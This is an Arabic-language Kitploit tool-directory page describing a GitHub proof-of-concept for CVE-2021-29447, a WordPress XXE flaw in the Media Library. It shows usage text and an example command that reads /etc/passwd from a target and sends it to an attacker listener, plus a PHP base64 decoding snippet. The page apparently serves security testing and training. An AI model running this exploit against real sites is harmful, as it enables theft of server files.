Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-29447-PoC — برهان مفهوم لاستغلال ثغرة في مكتبة الوسائط في ووردبريس 5.6 | Kitploit
أدوات/GitHubGitHub/0xrar/cve-2021-29447-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHub0xrar/cve-2021-29447-poc

CVE-2021-29447-PoC

برهان مفهوم لاستغلال ثغرة في مكتبة الوسائط في ووردبريس 5.6

عرض المستودع
61منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-29447 إثبات المفهوم

root@kitploit:~
╔═╗╦  ╦╔═╗
║  ╚╗╔╝║╣────2021-29447
╚═╝ ╚╝ ╚═╝
Written By (Isa Ebrahim - 0xRar) on January, 2023

═══════════════════════════════════════════════════════════════════════════
[*] Title: Wordpress XML parsing issue in the Media Library leading to XXE
[*] Affected versions: Wordpress 5.6 - 5.7
[*] Patched version: Wordpress 5.7.1
[*] Installation version: PHP 8
═══════════════════════════════════════════════════════════════════════════

CVE-2021-29447: يمكن للمستخدم الذي لديه القدرة على رفع الملفات (مثل المؤلف) استغلال مشكلة في تحليل XML في مكتبة الوسائط مما يؤدي إلى هجمات XXE. يتطلب ذلك تثبيت ووردبريس باستخدام PHP 8. يمكن الوصول إلى الملفات الداخلية في هجوم XXE ناجح. تم إصلاح هذا في إصدار ووردبريس 5.7.1، إلى جانب الإصدارات المتأثرة الأقدم عبر إصدار ثانوي.

هذا النص البرمجي سهل الفهم والتشغيل وسيقوم بأتمتة الخطوات اللازمة لاستغلال هجوم XXE على مكتبة وسائط ووردبريس.

الاستخدام

root@kitploit:~
usage: PoC.py [-h] [-l LHOST] [-p PORT] [-f FILE]

options:
  -h, --help            show this help message and exit
  -l LHOST, --lhost LHOST  your server ip address e.g. 10.0.2.15
  -p PORT, --port PORT  your server port e.g. 1337
  -f FILE, --file FILE  system file to read e.g. /etc/passwd

مثال:

root@kitploit:~
$ python3 PoC.py -l 10.0.2.15 -p 8000 -f /etc/passwd

لفك تشفير base64 استخدم/قم بتشغيل مقتطف PHP التالي:

root@kitploit:~
<?php
echo zlib_decode(base64_decode('base64_here'));
?>
root@kitploit:~
$ php decode.php

  • المراجع:
    • https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh
    • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447
    • https://tryhackme.com/room/wordpresscve202129447
تنزيل الأداة